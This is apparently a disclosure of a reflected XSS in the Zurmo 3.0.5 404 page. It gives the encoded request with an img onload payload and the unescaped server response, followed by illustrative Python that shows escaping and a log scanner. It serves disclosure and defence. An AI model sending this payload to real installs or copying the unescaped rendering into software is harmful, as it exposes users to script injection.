In a naive default install of the open-source Zurmo 3.0.5 on Debian Jessie it was noted that some 404 error messages are not properly escaped. The request
GET /app/index.php/accounts/default/autoCompletedcb81%3cimg%20src%3da%20onload%3dalert(1)%3e93a48?term=C HTTP/1.1
resulted in a reflected XSS in the 404 page.
I wondered if this might be fixed in later versions of the Yii framework, as it wasn't immediately apparent what was happening.
HTTP/1.0 404 Not Found
Date: Tue, 22 Dec 2015 00:34:58 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 218
Connection: close
Content-Type: text/html; charset=UTF-8

The system is unable to find the requested action "autoCompletedcb81<img src=a onload=alert(1)>93a48".<script>$('#zurmoSentryId').append('The reference id for this error is d1212d41ec9b45bb91201c6c52a4f98d.');</script>
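As an added illustration (not Zurmo's or Yii's own code), the following Python shows why the response above is exploitable and what the fix looks like: the action name is percent-decoded from the request path the way the router does, rendered unescaped as in the report, then HTML-escaped, and a small scanner flags access-log entries whose action segment carries markup. The log lines, regexes and function names are constructed assumptions, not taken from the product.

```python
import html
import re
from urllib.parse import unquote

# Constructed access-log lines (combined log format) for illustration. The first
# mirrors the request in the report; the second is an ordinary autocomplete call.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Dec/2015:00:34:58 +0000] "GET /app/index.php/accounts/default/'
    'autoCompletedcb81%3cimg%20src%3da%20onload%3dalert(1)%3e93a48?term=C HTTP/1.1" 404 218',
    '198.51.100.8 - - [22/Dec/2015:00:35:10 +0000] "GET /app/index.php/accounts/default/'
    'autoComplete?term=C HTTP/1.1" 200 512',
]

REQUEST_RE = re.compile(r'"([A-Z]+) (\S+) HTTP/\d\.\d" (\d{3})')
TAG_RE = re.compile(r'<\s*/?\s*[a-zA-Z][^>]*>')

def action_from_target(target):
    """Percent-decode the last path segment, which the router treats as the action name."""
    path = target.split('?', 1)[0]
    return unquote(path.rsplit('/', 1)[-1])

def vulnerable_404_body(action):
    # Unescaped interpolation: the behaviour the report describes.
    return 'The system is unable to find the requested action "%s".' % action

def hardened_404_body(action):
    # Escape the attacker-controlled value before it reaches the HTML body.
    return 'The system is unable to find the requested action "%s".' % html.escape(action, quote=True)

def contains_markup(text):
    return TAG_RE.search(text) is not None

def flag_reflected_markup(log_lines):
    """Return (status, decoded action) for requests whose action name carries HTML markup."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        action = action_from_target(m.group(2))
        if contains_markup(action):
            hits.append((m.group(3), action))
    return hits

if __name__ == '__main__':
    for status, action in flag_reflected_markup(SAMPLE_LOG):
        print(status, repr(action))
        print('vulnerable:', vulnerable_404_body(action))
        print('hardened:  ', hardened_404_body(action))
```

The scanner only inspects the decoded path segment, so encoded payloads in the query string would need the same treatment applied to each query value.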